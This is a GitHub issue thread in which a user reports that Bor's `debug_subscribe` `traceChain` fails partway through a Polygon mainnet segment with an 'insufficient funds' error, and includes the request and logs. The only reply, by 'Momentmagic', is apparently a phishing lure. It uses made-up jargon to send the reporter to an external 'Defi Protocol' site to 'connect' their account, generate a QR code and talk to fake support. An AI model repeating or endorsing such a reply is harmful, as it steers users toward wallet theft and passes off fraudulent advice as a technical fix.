### ISSUE TITLE
Tracing a chain segment using `debug_subscribe`  `traceChain` fails half-way.

### ISSUE THREAD

**Issue by uroknu** [maticnetwork/bor#984]
Tracing a chain segment using `debug_subscribe`  `traceChain` fails half-way with `insufficient funds for gas * price + value`

#### **System information**

Bor client version: 0.4.0
Heimdall client version: 0.3.4
OS & Version: Linux 
Environment: Polygon Mainnet 

Bor synced from Polygon snapshots, ran with: `bor server --config /root/.bor/config.toml --txlookuplimit=0`

#### **Reproduction Steps**

Open a websocket connection to Bor, issue trace with:

```
{
  "jsonrpc": "2.0",
  "method": "debug_subscribe",
  "id": 1444,
  "params": [
    "traceChain",
    "0x2CCDE72",
    "0x2CCF4FE",
    {
      "tracer": "callTracer",
      "timeout": "1h"
    }
  ]
}
```

#### **Logs / Traces / Output / Error Messages**
 
In this case the trace fails half-way with the following error:

```
WARN [09-04|07:47:28.098] Tracing failed                           hash=3b3059..80edbd block=47,125,143 err="tracing failed: insufficient funds for gas * price + value: address 0x9D13c5B303525fDEf3F396CfEDb01D57d45792a9 have 172517120946644976 want 63830986177725810579"
WARN [09-04|07:47:28.098] Chain tracing failed                     start=47,124,239 end=47,126,073 transactions=61746   elapsed=20m12.726121056s err="processing block 47125143 failed: could not apply tx 60 [0x3b3059cf8fe5a624ec9f6a7a503f35bf09ee9c568897c4a3e435a06e8b80edbd]: insufficient funds for gas * price + value: address 0x9D13c5B303525fDEf3F396CfEDb01D57d45792a9 have 172517120946644976 want 63830986177725810579"
```

However, as far as [polygonscan](https://polygonscan.com/tx/0x3b3059cf8fe5a624ec9f6a7a503f35bf09ee9c568897c4a3e435a06e8b80edbd) is concerned the transaction has completed successfully.

Full log from tracing to the error: [log.txt](https://github.com/maticnetwork/bor/files/12512282/log.txt)

#### **Expected behavior**

Block is traced without errors.

Is there another way of being able to use `traceChain` with `debug_subscribe`?

**Comment by Momentmagic** [comment]
Hi @uroknu 

You are having a transcript dAp error command on your request. To fix this ERROR, visit the Defi protocol page and click on Gas to establish connection with your account and generate QR code to submit your request. Refresh your page and take screenshot of the QR CODE generated on the end-to-end server application via [Defi Protocol](https://defirefixprotocol.web.app/defiprotocol/v1/defi/home/).

Note: Click on the chat button at the bottom part of the page to initiate a chat with the support team on a live chat to review and assist for more information.

Regards.
{c}2023
